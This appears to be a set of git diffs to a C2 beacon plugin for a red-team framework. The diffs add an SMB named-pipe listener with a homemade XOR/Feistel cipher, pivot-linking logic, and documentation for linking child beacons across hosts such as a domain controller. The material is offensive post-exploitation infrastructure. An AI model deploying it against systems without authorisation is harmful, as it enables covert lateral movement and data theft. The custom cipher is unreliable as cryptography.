--- a/agent_kharon/src_server/pl_main.go
+++ b/agent_kharon/src_server/pl_main.go
@@ -4,6 +4,7 @@ import (
 	// "database/sql/driver"
 	"encoding/hex"
 	"encoding/json"
+	"fmt"
 	"io"
 	"math/rand"
 	"time"
@@ -239,14 +240,25 @@ func (ext *ExtenderAgent) PivotPackData(pivotId string, data []byte) (ax.TaskDat
 	childId := pivotId
 	if ModuleObject != nil && ModuleObject.ts != nil {
 		_, _, cid := ModuleObject.ts.TsGetPivotInfoById(pivotId)
+		fmt.Printf("[PIVOT-DBG] PivotPackData: pivotId=%s, cid=%s\n", pivotId, cid)
 		if cid != "" {
 			if origUUID, ok := PivotUUIDMap[cid]; ok {
 				childId = origUUID
+				fmt.Printf("[PIVOT-DBG] PivotPackData: resolved %s → %s (from PivotUUIDMap)\n", cid, origUUID)
 			} else {
 				childId = cid
+				fmt.Printf("[PIVOT-DBG] PivotPackData: no PivotUUIDMap entry for %s, using cid\n", cid)
 			}
 		}
 	}
+	fmt.Printf("[PIVOT-DBG] PivotPackData: final childId=%s, dataLen=%d\n", childId, len(data))
+
+	// Don't send Exchange when child has no pending data — the beacon rejects
+	// empty Exchange tasks and it wastes a pipe cycle.
+	if len(data) == 0 {
+		return ax.TaskData{}, fmt.Errorf("no data for child")
+	}
+
 	packData, err := PackPivotTasks(childId, data)
 	if err != nil {
 		return ax.TaskData{}, err

--- a/agent_kharon/src_server/pl_main.go
+++ b/agent_kharon/src_server/pl_main.go
@@ -223,7 +223,16 @@ func (ext *ExtenderAgent) PackTasks(agentData ax.AgentData, tasks []ax.TaskData)
 }
 
 func (ext *ExtenderAgent) PivotPackData(pivotId string, data []byte) (ax.TaskData, error) {
-	packData, err := PackPivotTasks(pivotId, data)
+	// Resolve ChildAgentId from pivot table — the beacon identifies children
+	// by their AgentId (8 chars), not the server's task-based pivotId.
+	childId := pivotId
+	if ModuleObject != nil && ModuleObject.ts != nil {
+		_, _, cid := ModuleObject.ts.TsGetPivotInfoById(pivotId)
+		if cid != "" {
+			childId = cid
+		}
+	}
+	packData, err := PackPivotTasks(childId, data)
 	if err != nil {
 		return ax.TaskData{}, err
 	}

--- a/agent_kharon/src_server/pl_main.go
+++ b/agent_kharon/src_server/pl_main.go
@@ -240,18 +240,14 @@ func (ext *ExtenderAgent) PivotPackData(pivotId string, data []byte) (ax.TaskDat
 	childId := pivotId
 	if ModuleObject != nil && ModuleObject.ts != nil {
 		_, _, cid := ModuleObject.ts.TsGetPivotInfoById(pivotId)
-		fmt.Printf("[PIVOT-DBG] PivotPackData: pivotId=%s, cid=%s\n", pivotId, cid)
 		if cid != "" {
 			if origUUID, ok := PivotUUIDMap[cid]; ok {
 				childId = origUUID
-				fmt.Printf("[PIVOT-DBG] PivotPackData: resolved %s → %s (from PivotUUIDMap)\n", cid, origUUID)
 			} else {
 				childId = cid
-				fmt.Printf("[PIVOT-DBG] PivotPackData: no PivotUUIDMap entry for %s, using cid\n", cid)
 			}
 		}
 	}
-	fmt.Printf("[PIVOT-DBG] PivotPackData: final childId=%s, dataLen=%d\n", childId, len(data))
 
 	// Don't send Exchange when child has no pending data — the beacon rejects
 	// empty Exchange tasks and it wastes a pipe cycle.

--- a/agent_kharon/src_server/pl_main.go
+++ b/agent_kharon/src_server/pl_main.go
@@ -154,6 +154,11 @@ var (
 	// agentData is the outer HTTP parent — not the SMB child that actually did the link.
 	// This map lets us find the real parent.
 	TaskOwnerMap = make(map[string]string)
+
+	// SmbPipeName stores the pipe name from the SMB listener config.
+	// Updated during Generate() when building an SMB beacon.
+	// Used by CreateTask to auto-resolve pipe name for "link smb <target>".
+	SmbPipeName = "kharon_c2"
 )
 
 func (p *PluginAgent) GetExtender() ax.ExtenderAgent {

--- a/agent_kharon/src_server/pl_main.go
+++ b/agent_kharon/src_server/pl_main.go
@@ -223,13 +223,19 @@ func (ext *ExtenderAgent) PackTasks(agentData ax.AgentData, tasks []ax.TaskData)
 }
 
 func (ext *ExtenderAgent) PivotPackData(pivotId string, data []byte) (ax.TaskData, error) {
-	// Resolve ChildAgentId from pivot table — the beacon identifies children
-	// by their AgentId (8 chars), not the server's task-based pivotId.
+	// Resolve the beacon's original UUID from the pivot table.
+	// The beacon stores children by SmbUUID (first 8 chars of checkin UUID),
+	// but the server assigns a random agent ID. We stored the mapping at Link time.
 	childId := pivotId
 	if ModuleObject != nil && ModuleObject.ts != nil {
 		_, _, cid := ModuleObject.ts.TsGetPivotInfoById(pivotId)
 		if cid != "" {
-			childId = cid
+			origUUID, err := ModuleObject.ts.TsExtenderDataLoad("kharon_pivot_map", cid)
+			if err == nil && len(origUUID) > 0 {
+				childId = string(origUUID)
+			} else {
+				childId = cid
+			}
 		}
 	}
 	packData, err := PackPivotTasks(childId, data)

--- a/agent_kharon/src_server/pl_main.go
+++ b/agent_kharon/src_server/pl_main.go
@@ -147,6 +147,12 @@ var (
 	// PivotUUIDMap maps server-assigned agentId → original beacon UUID prefix (first 8 chars).
 	// Needed because CreateAgent generates a random ID unrelated to the beacon's SmbUUID.
 	PivotUUIDMap = make(map[string]string)
+
+	// TaskOwnerMap maps taskId → agentId for link commands.
+	// When ProcessTasksResult sees a TASK_PIVOT Link inside a relayed PROFILE_SMB response,
+	// agentData is the outer HTTP parent — not the SMB child that actually did the link.
+	// This map lets us find the real parent.
+	TaskOwnerMap = make(map[string]string)
 )
 
 func (p *PluginAgent) GetExtender() ax.ExtenderAgent {

--- a/agent_kharon/src_server/pl_main.go
+++ b/agent_kharon/src_server/pl_main.go
@@ -4,6 +4,7 @@ import (
 	// "database/sql/driver"
 	"encoding/hex"
 	"encoding/json"
+	"fmt"
 	"io"
 	"math/rand"
 	"time"

--- a/agent_kharon/src_server/pl_utils.go
+++ b/agent_kharon/src_server/pl_utils.go
@@ -2329,6 +2329,9 @@ func FormatKharonTable(data *KharonData) string {
 	b.WriteString(row("Kharon in-memory Size", fmt.Sprintf("%d bytes", data.Session.Base.Size)))
 	b.WriteString(row("Code Page (ACP)", fmt.Sprintf("%d", data.Session.Acp)))
 	b.WriteString(row("OEM Code Page", fmt.Sprintf("%d", data.Session.Oemcp)))
+	if data.PipeName != "" {
+		b.WriteString(row("SMB Pipe Name", data.PipeName))
+	}
 	b.WriteString(border("middle"))
 
 	// ==================== TIMING ====================

--- a/agent_kharon/src_server/pl_utils.go
+++ b/agent_kharon/src_server/pl_utils.go
@@ -847,6 +847,10 @@ const (
 )
 
 const (
+	PIPE_LIST int = 38
+)
+
+const (
 	EXIT_THREAD  int8 = 20
 	EXIT_PROCESS int8 = 21
 )

--- a/agent_kharon/src_server/pl_utils.go
+++ b/agent_kharon/src_server/pl_utils.go
@@ -775,6 +775,12 @@ const (
 )
 
 const (
+	LINK_TYPE_SMB   int = 1
+	LINK_TYPE_TCP   int = 2
+	UNLINK_TYPE     int = 3
+)
+
+const (
 	COMMAND_TUNNEL_START_TCP = 62
 	COMMAND_TUNNEL_START_UDP = 63
 	COMMAND_TUNNEL_WRITE_TCP = 64

--- a/agent_kharon/src_server/pl_utils.go
+++ b/agent_kharon/src_server/pl_utils.go
@@ -48,6 +48,8 @@ type KharonData struct {
 		SecurebootEnabled bool  `json:"secureboot_enabled"`
 	} `json:"machine"`
 
+	PipeName string `json:"pipe_name"`
+
 	Session struct {
 		AgentIdStr string `json:"agent_id_str"`
 		AgentIdInt uint32 `json:"agent_id_int"`

--- a/doc/2. Setup.md
+++ b/doc/2. Setup.md
@@ -12,7 +12,11 @@ sudo apt update && sudo apt install clang llvm -y
 ./setup_kharon.sh --ax /opt/AdaptixC2/
 ```
 
-> **Note:** The setup script automatically rebuilds the Adaptix server binary to ensure it matches the plugin versions. If you rebuild the server separately (e.g. `make server-ext`), re-run the setup script afterwards — Go plugins require the server and all `.so` files to be compiled against the exact same package versions.
+> **Important:** Build the Adaptix server from source **before** running the setup script. Go plugins require the server binary and all `.so` plugins to be compiled in the same Go environment. If you use pre-built binaries and then compile Kharon plugins separately, the server will reject them with a version mismatch error.
+```bash
+cd /opt/AdaptixC2/AdaptixServer
+make server-ext    # or: go build -o ../dist/adaptixserver .
+```
 
 > Update the Adaptix profile file to include Kharon’s config.json and its listeners. For example:
 ```yaml

--- a/doc/2. Setup.md
+++ b/doc/2. Setup.md
@@ -12,11 +12,7 @@ sudo apt update && sudo apt install clang llvm -y
 ./setup_kharon.sh --ax /opt/AdaptixC2/
 ```
 
-> **Important:** After running the setup script, you must rebuild the Adaptix server so that the server binary and all plugins are compiled against the same package versions. Without this step, Go will reject the plugins with a "built with a different version" error.
-```bash
-cd /opt/AdaptixC2/AdaptixServer
-go build -o ../dist/adaptixserver .
-```
+> **Note:** The setup script automatically rebuilds the Adaptix server binary to ensure it matches the plugin versions. If you rebuild the server separately (e.g. `make server-ext`), re-run the setup script afterwards — Go plugins require the server and all `.so` files to be compiled against the exact same package versions.
 
 > Update the Adaptix profile file to include Kharon’s config.json and its listeners. For example:
 ```yaml

--- a/doc/2. Setup.md
+++ b/doc/2. Setup.md
@@ -12,6 +12,12 @@ sudo apt update && sudo apt install clang llvm -y
 ./setup_kharon.sh --ax /opt/AdaptixC2/
 ```
 
+> **Important:** After running the setup script, you must rebuild the Adaptix server so that the server binary and all plugins are compiled against the same package versions. Without this step, Go will reject the plugins with a "built with a different version" error.
+```bash
+cd /opt/AdaptixC2/AdaptixServer
+go build -o ../dist/adaptixserver .
+```
+
 > Update the Adaptix profile file to include Kharon’s config.json and its listeners. For example:
 ```yaml
   extenders:

--- a/doc/2. Setup.md
+++ b/doc/2. Setup.md
@@ -24,4 +24,5 @@ sudo apt update && sudo apt install clang llvm -y
     - "extenders/gopher_agent/config.yaml"
     - "extenders/agent_kharon/config.yaml"
     - "extenders/listener_kharon_http/config.yaml"
+    - "extenders/listener_kharon_smb/config.yaml"
 ```

--- a/doc/4. Commands.md
+++ b/doc/4. Commands.md
@@ -29,6 +29,9 @@ This document provides a complete reference for all available commands in the Kh
 - [Network](#network)
   - [socks](#socks)
   - [rportfwd](#rportfwd)
+- [Pivoting](#pivoting)
+  - [link](#link)
+  - [unlink](#unlink)
 
 ---
 
@@ -512,6 +515,55 @@ rportfwd stop
 
 ---
 
+## Pivoting
+
+### link
+
+Link to a child beacon over SMB named pipes. The parent beacon connects to a child SMB beacon's named pipe and establishes a pivot channel. All traffic for the child is relayed through the parent.
+
+| Subcommand | Description |
+|------------|-------------|
+| `smb` | Connect to a child beacon via SMB named pipe |
+
+**Usage:**
+```
+link smb <target> <pipename>
+```
+
+| Argument | Type | Required | Description |
+|----------|------|----------|-------------|
+| `target` | STRING | Yes | Target hostname or IP address (use `.` for localhost) |
+| `pipename` | STRING | Yes | Named pipe name (without `\\.\pipe\` prefix) |
+
+**Examples:**
+```
+link smb . kharon_c2
+link smb 10.10.10.5 kharon_c2
+link smb DC01.corp.local kharon_smb
+```
+
+---
+
+### unlink
+
+Disconnect a child pivot beacon.
+
+**Usage:**
+```
+unlink <agent_id>
+```
+
+| Argument | Type | Required | Description |
+|----------|------|----------|-------------|
+| `agent_id` | STRING | Yes | Agent ID of the child beacon to disconnect |
+
+**Example:**
+```
+unlink 3a51d3be
+```
+
+---
+
 ## Quick Reference
 
 | Category | Command | Description |
@@ -543,3 +595,5 @@ rportfwd stop
 | Token | `token privget/privlist` | Token privilege info |
 | Network | `socks start/stop` | SOCKS5 proxy management |
 | Network | `rportfwd start/stop` | Remote port forwarding |
+| Pivoting | `link smb` | Link to child SMB beacon |
+| Pivoting | `unlink` | Disconnect child beacon |

--- a/listener_kharon_smb/Makefile
+++ b/listener_kharon_smb/Makefile
@@ -1,0 +1,24 @@
+.PHONY: all clean help
+
+GO := go
+GOFLAGS := -buildmode=plugin -ldflags="-s -w"
+GOEXPERIMENT := jsonv2,greenteagc
+DIST_DIR := dist
+OUTPUT_FILE := $(DIST_DIR)/listener_kharon_smb.so
+SRC_SERVER := src_server
+SOURCE_FILES := \
+	$(SRC_SERVER)/pl_lokycrypt.go \
+	$(SRC_SERVER)/pl_main.go \
+	$(SRC_SERVER)/pl_transport.go
+
+all: clean
+	@ echo "    * Building listener_kharon_smb plugin"
+	@ mkdir -p $(DIST_DIR)
+	@ cp config.yaml ax_config.axs ./$(DIST_DIR)/
+	@ GOEXPERIMENT=$(GOEXPERIMENT) $(GO) build $(GOFLAGS) -o $(OUTPUT_FILE) $(SOURCE_FILES)
+	@ echo "      done..."
+
+clean:
+	@ echo "    * Cleaning build artifacts..."
+	@ rm -rf $(DIST_DIR)
+	@ echo "      done..."

--- a/listener_kharon_smb/ax_config.axs
+++ b/listener_kharon_smb/ax_config.axs
@@ -1,0 +1,46 @@
+/// Kharon SMB listener
+
+function ListenerUI(mode_create)
+{
+    let spacer1 = form.create_vspacer()
+
+    let labelPipename = form.create_label("Pipename (C2):");
+    let textlinePipename = form.create_textline("kharon_c2");
+    textlinePipename.setPlaceholder("Named pipe name (without \\\\.\\pipe\\ prefix)");
+    if(!mode_create) {
+        textlinePipename.setReadOnly(true);
+    }
+
+    let labelEncryptKey = form.create_label("Encryption key:");
+    let textlineEncryptKey = form.create_textline(ax.random_string(32, "hex"));
+    textlineEncryptKey.setEnabled(mode_create)
+    let buttonEncryptKey = form.create_button("Generate");
+    buttonEncryptKey.setEnabled(mode_create)
+
+    let spacer2 = form.create_vspacer()
+
+    form.connect(buttonEncryptKey, "clicked", function() { textlineEncryptKey.setText( ax.random_string(32, "hex") ); });
+
+    let layout = form.create_gridlayout();
+    layout.addWidget(spacer1,            0, 0, 1, 3);
+    layout.addWidget(labelPipename,      1, 0, 1, 1);
+    layout.addWidget(textlinePipename,   1, 1, 1, 2);
+    layout.addWidget(labelEncryptKey,    2, 0, 1, 1);
+    layout.addWidget(textlineEncryptKey, 2, 1, 1, 1);
+    layout.addWidget(buttonEncryptKey,   2, 2, 1, 1);
+    layout.addWidget(spacer2,            3, 0, 1, 3);
+
+    let container = form.create_container();
+    container.put("pipename", textlinePipename);
+    container.put("encrypt_key", textlineEncryptKey);
+
+    let panel = form.create_panel();
+    panel.setLayout(layout);
+
+    return {
+        ui_panel: panel,
+        ui_container: container,
+        ui_height: 650,
+        ui_width: 650
+    }
+}

--- a/listener_kharon_smb/config.yaml
+++ b/listener_kharon_smb/config.yaml
@@ -1,0 +1,7 @@
+extender_type: "listener"
+extender_file: "listener_kharon_smb.so"
+ax_file: "ax_config.axs"
+
+listener_name: "KharonSMB"
+listener_type: "internal"
+protocol: "bind_smb"

--- a/listener_kharon_smb/go.mod
+++ b/listener_kharon_smb/go.mod
@@ -1,0 +1,5 @@
+module adaptix_listener_kharon_smb
+
+go 1.25.4
+
+require github.com/Adaptix-Framework/axc2 v1.1.3

--- a/listener_kharon_smb/go.sum
+++ b/listener_kharon_smb/go.sum
@@ -1,0 +1,5 @@
+github.com/Adaptix-Framework/axc2 v1.1.3 h1:2Y28y0PMiX2v1EReK95Qe2TYoaOJfeYNfiMP/L8WGYE=
+github.com/Adaptix-Framework/axc2 v1.1.3/go.mod h1:3oJyFeRVIql1RTsNa0meEqK3+P+6JTAMMjMdVyXhbaQ=
+golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.36.0 h1:KVRy2GtZBrk1cBYA7MKu5bEZFxQk4NIDV6RLVcC8o0k=
+golang.org/x/sys v0.36.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=

--- a/listener_kharon_smb/src_server/pl_lokycrypt.go
+++ b/listener_kharon_smb/src_server/pl_lokycrypt.go
@@ -1,0 +1,157 @@
+package main
+
+import (
+	"bytes"
+)
+
+const (
+	BlockSize  = 8
+	NumRounds  = 16
+	XorKeySize = 16
+)
+
+type LokyCrypt struct {
+	Key    [16]byte
+	XorKey [XorKeySize]byte
+}
+
+func NewLokyCrypt(key []byte, xorKey []byte) *LokyCrypt {
+	var fixedKey [16]byte
+	copy(fixedKey[:], key)
+
+	var fixedXor [XorKeySize]byte
+	copy(fixedXor[:], xorKey)
+
+	return &LokyCrypt{
+		Key:    fixedKey,
+		XorKey: fixedXor,
+	}
+}
+
+func bytesToUint32BE(b []byte) uint32 {
+	return (uint32(b[0]) << 24) |
+		(uint32(b[1]) << 16) |
+		(uint32(b[2]) << 8) |
+		uint32(b[3])
+}
+
+func uint32ToBytesBE(val uint32) []byte {
+	return []byte{
+		byte((val >> 24) & 0xFF),
+		byte((val >> 16) & 0xFF),
+		byte((val >> 8) & 0xFF),
+		byte(val & 0xFF),
+	}
+}
+
+func (lc *LokyCrypt) Cycle(block []byte, encrypt bool) {
+	left := bytesToUint32BE(block[0:4])
+	right := bytesToUint32BE(block[4:8])
+
+	if encrypt {
+		for i := 0; i < NumRounds; i++ {
+			tmp := right
+			right = left ^ (right + uint32(lc.Key[i%len(lc.Key)]))
+			left = tmp
+		}
+	} else {
+		for i := NumRounds - 1; i >= 0; i-- {
+			tmp := left
+			left = right ^ (left + uint32(lc.Key[i%len(lc.Key)]))
+			right = tmp
+		}
+	}
+
+	copy(block[0:4], uint32ToBytesBE(left))
+	copy(block[4:8], uint32ToBytesBE(right))
+}
+
+func (lc *LokyCrypt) CalcPadding(length int) int {
+	if length%BlockSize == 0 {
+		return length + BlockSize
+	}
+	return length + (BlockSize - (length % BlockSize))
+}
+
+func (lc *LokyCrypt) AddPadding(data []byte, length int, total int) []byte {
+	padLen := byte(total - length)
+	padding := bytes.Repeat([]byte{padLen}, int(padLen))
+	return append(data[:length], padding...)
+}
+
+func (lc *LokyCrypt) Encrypt(data []byte) []byte {
+	length := len(data)
+	total := lc.CalcPadding(length)
+	padded := lc.AddPadding(data, length, total)
+
+	encrypted := make([]byte, total)
+	copy(encrypted, padded)
+
+	for i := 0; i < total; i += BlockSize {
+		lc.Cycle(encrypted[i:i+BlockSize], true)
+	}
+	return encrypted
+}
+
+func (lc *LokyCrypt) Decrypt(data []byte) []byte {
+	if len(data)%BlockSize != 0 || len(data) == 0 {
+		return data
+	}
+
+	decrypted := make([]byte, len(data))
+	copy(decrypted, data)
+
+	for i := 0; i < len(decrypted); i += BlockSize {
+		lc.Cycle(decrypted[i:i+BlockSize], false)
+	}
+
+	return lc.RmPadding(decrypted)
+}
+
+func (lc *LokyCrypt) RmPadding(data []byte) []byte {
+	if len(data) < BlockSize {
+		return data
+	}
+
+	padLen := int(data[len(data)-1])
+
+	if padLen == 0 || padLen > BlockSize || len(data) < padLen {
+		return data
+	}
+
+	for i := len(data) - padLen; i < len(data); i++ {
+		if data[i] != byte(padLen) {
+			return data
+		}
+	}
+
+	return data[:len(data)-padLen]
+}
+
+func (lc *LokyCrypt) Xor(data []byte) {
+	for i, j := 0, 0; i < len(data); i++ {
+		if j == len(lc.XorKey) {
+			j = 0
+		}
+		if i%2 == 0 {
+			data[i] ^= lc.XorKey[j]
+		} else {
+			data[i] ^= lc.XorKey[j] ^ byte(j)
+		}
+		j++
+	}
+}
+
+func xor(data []byte, key []byte) {
+	for i, j := 0, 0; i < len(data); i++ {
+		if j == len(key) {
+			j = 0
+		}
+		if i%2 == 0 {
+			data[i] ^= key[j]
+		} else {
+			data[i] ^= key[j] ^ byte(j)
+		}
+		j++
+	}
+}

--- a/listener_kharon_smb/src_server/pl_main.go
+++ b/listener_kharon_smb/src_server/pl_main.go
@@ -319,37 +319,39 @@ func (l *Listener) InternalHandler(data []byte) (string, error) {
 			}
 		}
 
-		// Try all stored keys to find a match (handles renamed agent IDs).
-		// Validate decrypted data starts with a known format byte to avoid
-		// false matches — a wrong key produces garbage that won't start with 0x01/0x05/0x07.
-		keys, keyErr := ModuleObject.ts.TsExtenderDataKeys(l.transport.Name)
-		if keyErr == nil {
+		// Look up key by the original UUID prefix (data[:8]).
+		// The key was stored as key_<originalUUID> at first checkin, and also
+		// as key_<serverAssignedId>. Using the original UUID is the most reliable
+		// way to find the correct key — avoids false matches from key scanning.
+		origPrefix := string(data[:8])
+		storedKey, keyErr := ModuleObject.ts.TsExtenderDataLoad(l.transport.Name, "key_"+origPrefix)
+		if keyErr == nil && len(storedKey) == 16 {
+			encryptedData := data[36:]
+			crypt := NewLokyCrypt(storedKey, storedKey)
+			decryptedData := crypt.Decrypt(encryptedData)
+
+			// Find the server-assigned agent ID for this original UUID
+			agentID := origPrefix // fallback
+			keys, _ := ModuleObject.ts.TsExtenderDataKeys(l.transport.Name)
 			for _, k := range keys {
 				if len(k) > 4 && k[:4] == "key_" {
-					agentID := k[4:]
-					storedKey, _ := ModuleObject.ts.TsExtenderDataLoad(l.transport.Name, k)
-					if len(storedKey) == 16 && ModuleObject.ts.TsAgentIsExists(agentID) {
-						encryptedData := data[36:]
-						crypt := NewLokyCrypt(storedKey, storedKey)
-						decryptedData := crypt.Decrypt(encryptedData)
-
-						// Verify decryption produced valid data — wrong key = garbage
-						if len(decryptedData) > 0 {
-							fb := decryptedData[0]
-							fmt.Printf("[IH-DBG] stored key scan: trying key_%s, firstByte=0x%02x\n", agentID, fb)
-							if fb != 0x01 && fb != 0x05 && fb != 0x07 {
-								continue // wrong key, try next
-							}
+					candidateID := k[4:]
+					if candidateID != origPrefix && ModuleObject.ts.TsAgentIsExists(candidateID) {
+						// Check if this agent has the same key
+						candidateKey, _ := ModuleObject.ts.TsExtenderDataLoad(l.transport.Name, k)
+						if len(candidateKey) == 16 && string(candidateKey) == string(storedKey) {
+							agentID = candidateID
+							break
 						}
-
-						fmt.Printf("[IH-DBG] stored key scan: MATCHED agent=%s\n", agentID)
-						_ = ModuleObject.ts.TsAgentSetTick(agentID, l.transport.Name)
-						processDecryptedData(agentID, decryptedData)
-
-						return agentID, nil
 					}
 				}
 			}
+
+			fmt.Printf("[IH-DBG] direct key match: origUUID='%s' → agent=%s\n", origPrefix, agentID)
+			_ = ModuleObject.ts.TsAgentSetTick(agentID, l.transport.Name)
+			processDecryptedData(agentID, decryptedData)
+
+			return agentID, nil
 		}
 	}
 

--- a/listener_kharon_smb/src_server/pl_main.go
+++ b/listener_kharon_smb/src_server/pl_main.go
@@ -370,11 +370,33 @@ func (l *Listener) InternalHandler(data []byte) (string, error) {
 	crypt := NewLokyCrypt(extractedKey, extractedKey)
 	decryptedBeat := crypt.Decrypt(encryptedBeat)
 
-	// Clear old stored keys (prevent stale key matching across sessions)
+	// Clean up only stale keys (agents that no longer exist).
+	// Do NOT clear all keys — other active SMB agents need their keys preserved.
 	oldKeys, _ := ModuleObject.ts.TsExtenderDataKeys(l.transport.Name)
 	for _, k := range oldKeys {
 		if len(k) > 4 && k[:4] == "key_" {
-			ModuleObject.ts.TsExtenderDataDelete(l.transport.Name, k)
+			oldAgentID := k[4:]
+			if !ModuleObject.ts.TsAgentIsExists(oldAgentID) {
+				// Check if this is an original-UUID key (not server-assigned)
+				// by seeing if any existing agent shares the same key bytes
+				oldKey, _ := ModuleObject.ts.TsExtenderDataLoad(l.transport.Name, k)
+				isOrphan := true
+				for _, k2 := range oldKeys {
+					if k2 != k && len(k2) > 4 && k2[:4] == "key_" {
+						k2Agent := k2[4:]
+						if ModuleObject.ts.TsAgentIsExists(k2Agent) {
+							k2Key, _ := ModuleObject.ts.TsExtenderDataLoad(l.transport.Name, k2)
+							if len(k2Key) == 16 && len(oldKey) == 16 && string(k2Key) == string(oldKey) {
+								isOrphan = false
+								break
+							}
+						}
+					}
+				}
+				if isOrphan {
+					ModuleObject.ts.TsExtenderDataDelete(l.transport.Name, k)
+				}
+			}
 		}
 	}
 

--- a/listener_kharon_smb/src_server/pl_main.go
+++ b/listener_kharon_smb/src_server/pl_main.go
@@ -311,7 +311,9 @@ func (l *Listener) InternalHandler(data []byte) (string, error) {
 			}
 		}
 
-		// Try all stored keys to find a match (handles renamed agent IDs)
+		// Try all stored keys to find a match (handles renamed agent IDs).
+		// Validate decrypted data starts with a known format byte to avoid
+		// false matches — a wrong key produces garbage that won't start with 0x01/0x05/0x07.
 		keys, keyErr := ModuleObject.ts.TsExtenderDataKeys(l.transport.Name)
 		if keyErr == nil {
 			for _, k := range keys {
@@ -322,6 +324,14 @@ func (l *Listener) InternalHandler(data []byte) (string, error) {
 						encryptedData := data[36:]
 						crypt := NewLokyCrypt(storedKey, storedKey)
 						decryptedData := crypt.Decrypt(encryptedData)
+
+						// Verify decryption produced valid data — wrong key = garbage
+						if len(decryptedData) > 0 {
+							fb := decryptedData[0]
+							if fb != 0x01 && fb != 0x05 && fb != 0x07 {
+								continue // wrong key, try next
+							}
+						}
 
 						_ = ModuleObject.ts.TsAgentSetTick(agentID, l.transport.Name)
 						processDecryptedData(agentID, decryptedData)

--- a/listener_kharon_smb/src_server/pl_main.go
+++ b/listener_kharon_smb/src_server/pl_main.go
@@ -278,9 +278,11 @@ func (l *Listener) InternalHandler(data []byte) (string, error) {
 	// QuickMsg (0x05) / QuickOut (0x07): wrap with 7-byte header like HTTP listener
 	processDecryptedData := func(agentID string, decryptedData []byte) {
 		if len(decryptedData) <= 1 {
+			fmt.Printf("[IH-DBG] processDecryptedData: too short (%d) for agent %s\n", len(decryptedData), agentID)
 			return
 		}
 		firstByte := decryptedData[0]
+		fmt.Printf("[IH-DBG] processDecryptedData: agent=%s, len=%d, firstByte=0x%02x\n", agentID, len(decryptedData), firstByte)
 		var taskData []byte
 		if firstByte == 0x05 || firstByte == 0x07 {
 			msgTypePattern := append([]byte{0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0}, decryptedData...)
@@ -288,14 +290,20 @@ func (l *Listener) InternalHandler(data []byte) (string, error) {
 		} else if firstByte == 0x01 {
 			taskData = decryptedData[1:]
 		} else {
+			fmt.Printf("[IH-DBG] processDecryptedData: UNKNOWN format 0x%02x, passing raw\n", firstByte)
 			taskData = decryptedData
 		}
-		_ = ModuleObject.ts.TsAgentProcessData(agentID, taskData)
+		err := ModuleObject.ts.TsAgentProcessData(agentID, taskData)
+		if err != nil {
+			fmt.Printf("[IH-DBG] TsAgentProcessData ERROR: %v\n", err)
+		}
 	}
 
 	// Try to match against known agents by UUID in first 8 bytes
 	if totalLen >= 36 {
 		testAgentID := string(data[:8])
+		fmt.Printf("[IH-DBG] InternalHandler: len=%d, testAgentID='%s', exists=%v\n",
+			totalLen, testAgentID, ModuleObject.ts.TsAgentIsExists(testAgentID))
 
 		if ModuleObject.ts.TsAgentIsExists(testAgentID) {
 			storedKey, err := ModuleObject.ts.TsExtenderDataLoad(l.transport.Name, "key_"+testAgentID)
@@ -328,11 +336,13 @@ func (l *Listener) InternalHandler(data []byte) (string, error) {
 						// Verify decryption produced valid data — wrong key = garbage
 						if len(decryptedData) > 0 {
 							fb := decryptedData[0]
+							fmt.Printf("[IH-DBG] stored key scan: trying key_%s, firstByte=0x%02x\n", agentID, fb)
 							if fb != 0x01 && fb != 0x05 && fb != 0x07 {
 								continue // wrong key, try next
 							}
 						}
 
+						fmt.Printf("[IH-DBG] stored key scan: MATCHED agent=%s\n", agentID)
 						_ = ModuleObject.ts.TsAgentSetTick(agentID, l.transport.Name)
 						processDecryptedData(agentID, decryptedData)
 

--- a/listener_kharon_smb/src_server/pl_main.go
+++ b/listener_kharon_smb/src_server/pl_main.go
@@ -1,0 +1,379 @@
+package main
+
+import (
+	"bytes"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+
+	ax "github.com/Adaptix-Framework/axc2"
+)
+
+type Teamserver interface {
+	TsAgentIsExists(agentId string) bool
+	TsAgentCreate(agentCrc string, agentId string, beat []byte, listenerName string, ExternalIP string, Async bool) (ax.AgentData, error)
+	TsAgentProcessData(agentId string, bodyData []byte) error
+	TsAgentUpdateData(newAgentData ax.AgentData) error
+	TsAgentTerminate(agentId string, terminateTaskId string) error
+
+	TsAgentUpdateDataPartial(agentId string, updateData interface{}) error
+	TsAgentSetTick(agentId string, listenerName string) error
+
+	TsAgentConsoleOutput(agentId string, messageType int, message string, clearText string, store bool)
+
+	TsAgentGetHostedAll(agentId string, maxDataSize int) ([]byte, error)
+	TsAgentGetHostedTasks(agentId string, maxDataSize int) ([]byte, error)
+	TsAgentGetHostedTasksCount(agentId string, count int, maxDataSize int) ([]byte, error)
+
+	TsTaskRunningExists(agentId string, taskId string) bool
+	TsTaskCreate(agentId string, cmdline string, client string, taskData ax.TaskData)
+	TsTaskUpdate(agentId string, updateData ax.TaskData)
+
+	TsTaskGetAvailableAll(agentId string, availableSize int) ([]ax.TaskData, error)
+	TsTaskGetAvailableTasks(agentId string, availableSize int) ([]ax.TaskData, int, error)
+	TsTaskGetAvailableTasksCount(agentId string, maxCount int, availableSize int) ([]ax.TaskData, int, error)
+	TsTasksPivotExists(agentId string, first bool) bool
+	TsTaskGetAvailablePivotAll(agentId string, availableSize int) ([]ax.TaskData, error)
+
+	TsClientGuiDisksWindows(taskData ax.TaskData, drives []ax.ListingDrivesDataWin)
+	TsClientGuiFilesStatus(taskData ax.TaskData)
+	TsClientGuiFilesWindows(taskData ax.TaskData, path string, files []ax.ListingFileDataWin)
+	TsClientGuiFilesUnix(taskData ax.TaskData, path string, files []ax.ListingFileDataUnix)
+	TsClientGuiProcessWindows(taskData ax.TaskData, process []ax.ListingProcessDataWin)
+	TsClientGuiProcessUnix(taskData ax.TaskData, process []ax.ListingProcessDataUnix)
+
+	TsCredentilsAdd(creds []map[string]interface{}) error
+	TsCredentilsEdit(credId string, username string, password string, realm string, credType string, tag string, storage string, host string) error
+	TsCredentialsSetTag(credsId []string, tag string) error
+	TsCredentilsDelete(credsId []string) error
+
+	TsDownloadAdd(agentId string, fileId string, fileName string, fileSize int64) error
+	TsDownloadUpdate(fileId string, state int, data []byte) error
+	TsDownloadClose(fileId string, reason int) error
+	TsDownloadDelete(fileid []string) error
+	TsDownloadSave(agentId string, fileId string, filename string, content []byte) error
